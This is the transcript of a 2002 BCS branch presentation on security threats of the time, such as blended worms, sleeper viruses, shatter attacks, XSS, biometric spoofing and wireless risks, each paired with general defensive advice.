1 / 22

Some Security Hot Issues

Some Security Hot Issues. Allan Wall BCS North London Branch Meeting 13 th November 2002. Who is the enemy ?. Classification. Attacker Description. Target. Results. Computer Crime. Vandal, Script Kiddie, Packet Monkey. Email, Web Sites. Downtime, Defacement, Denial of Service.

shel
Download Presentation

Some Security Hot Issues

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Some Security Hot Issues Allan Wall BCS North London Branch Meeting 13th November 2002

  2. Who is the enemy ? Classification Attacker Description Target Results Computer Crime Vandal,Script Kiddie,Packet Monkey Email,Web Sites Downtime, Defacement,Denial of Service Computer Crime ‘Criminal’ Cracker, ‘Black Hat’ Assets Monetary Gain Information Warfare Government Organization Political Infrastructure Political Power, Balance Change Cyber Terrorist Terrorists,Non-State Actors Physical Infrastructure Destruction

  3. Where do the threats come from? Attacks per 10,000 Internet Users Countries > 1M Internet Users Countries < 1M Internet Users Jan. – Jun. 2002 (Symantec 2002)

  4. The Redundant Message.. Cost of Damage • $151,230,100 – Theft of proprietary information • $45,288,150 – Virus • $35,001,650 – Insider Net Abuse • $19,066,601 – System Penetration • $4,283,600 – Denial of Service 186 Respondents in 2001 CSI/FBI Survey CodeRed Estimated: 2.5 Billion Dollars Nimda Cost Estimated: 500+ Million Dollars

  5. The Blended Threat • Isn’t going away • Combines hacking, DoS, and worm-like propagation • Most recent example – W32.Bugbear.mm • Mass mailing worm • It’s own SMTP engine • Discovers and utilises network shares to spread • Does keystroke logging • Creates a backdoor for access • Attempts to disable AV and personal firewall products • Due to a bug in shared drive exploit, it can overwhelm shared printers causing them to print reams of gibberish

  6. Blended Threat Defence • Proactive vulnerability management • Security in layers • Security in depth • Superior security response

  7. The Sleeper Virus • Not a fast mailer or a mass mailer - It's slower and more subtle • Hybris - a computer worm that uses encrypted plug-ins to update itself over the internet • Sits quietly monitoring email traffic • Compiles list of addresses and slowly leaks email infections • Morphs depending on updates

  8. The Sleeper Virus Defence • Update virus definitions frequently • Treat email attachments with suspicion • Use a personal firewall

  9. Shatter Attacks The mechanism used is the Win32 API, which has been relatively static since Windows NT 3.5 was released in July 1993 Microsoft cannot change it – without full scale redesign An example – Windows messaging / queuing An attacker can use these techniques to escalate their privileges

  10. Shatter Attacks - Defence • Full-scale Windows redesign (scrapping Win32) • Better design by every Windows application vendor • Protect your windows systems to make it hard for undesirables to get access they can exploit • Needs continual monitoring

  11. Cross site scripting attacks - XSS • “Expert hacks Hotmail in 1 line of code!” • Attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash to fool a user • Exploits dynamic web-site content resulting in: • account hijacking • changing of user settings • cookie theft/poisoning • false advertising • Will become more common, even automated

  12. XSS attacks - Defence • Design web pages that validates user input • HTML escaping • Using PERL scripting tools designed to help

  13. Biometrics • More secure and stronger identification. • moving away from (multiple) IDs/Passwords, reducing risk from “lost” or loaned credentials (including tokens). • Most common • Fingerprint, hand, iris / retina / facial / voice recognition. • Provides the inextricable link – the guarantee that the registered user is actually present. • Or does it…….?

  14. Biometrics • Relatively high cost solutions, immature technology – bigger cost/risk if they fail (but cheaper to support) • Privacy and intrusiveness issues • Accuracy – false positive / false negative rates • Facial recognition: only 60-80% accurate, 1 in 100 false +ve • Unproven/untested technologies – just how hard/easy are they to spoof? • Example: Finger print recognition • Can be spoofed for <$20 in about 30 minutes using “jelly” fingers

  15. Background security checks Less than 60% of organisations carry out checks on new staff • IT Security Professionals • Banking • Critical infrastructure • Energy • Telecoms • Utilities • Employees are still the weakest link

  16. Targeted Attacks • Focussed attack on specific targets within the organisation: • Spoof email or CD. • Social engineering to create “familiarity”: • Message on business opportunity,hobby, interest. • Low activity malware implanted: • Disable AV. • Collecting keystrokes or audio. • Email data out. • Response – “Combined interoperable defence.”

  17. The Good News… The Bad News…Airborne Viruses Personal, Local and Wide Area Connectivity is enabling the Enterprise and exposingto new security risk 2.5 and 3G can be visible for many miles 802.11 can be visible from over a mile away. Bluetooth 30 feet Source: Symantec 2002

  18. Airborne Viruses - Defence • Unless you don’t have assets worth protecting . . . • . . . Don’t use wireless technology without putting in the countermeasures that are available!

  19. The law of requisite variety (Prof.Ross Ashby) There must be as much variety in the control mechanism as there is variety in the threat Formal Descriptions The abundance or variety of alternative control actions which a control mechanism is capable of executing must be at least equal to the abundance or variety of the spontaneous fluctuations which have to be corrected by the control mechanism, if the control mechanism is to perform its function effectively. Only a greater amount of variety in a regulator can control the variety present in a given system. The larger the variety of actions available to a control system. The larger the variety of perturbations it is able to compensate Only variety can destroy variety.

  20. Ways to win.. • Proactive security – mitigate your risk (do not just rely on technology..) • Threats are defeated by Information + Technology • Superior response capability • “In-source” / outsource • Size and flexibility in defence

  21. References Symantec Figures: Internet Security Threat Report Volume II http://enterprisesecurity.symantec.com/content.cfm?EID=0&ArticleID=1539 Blended Threats: http://www.informationweek.com/story/IWK20020516S0020 http://www.symantec.com/symadvantage/012/blended.html Sleeper Virus: http://news.zdnet.co.uk/story/0,,t269-s2083648,00.html Shatter Attacks: http://security.tombom.co.uk/shatter.html Cross Site Scripting: http://www.securiteam.com/securityreviews/5FP000A81E.html Biometrics – BBC: http://news.bbc.co.uk/1/hi/sci/tech/1991517.stm Airborne Virus: http://www.networkmagazine.com/article/NMG20001130S0001/2 Ross Ashby: http://pespmc1.vub.ac.be/ASHBBOOK.html

More Related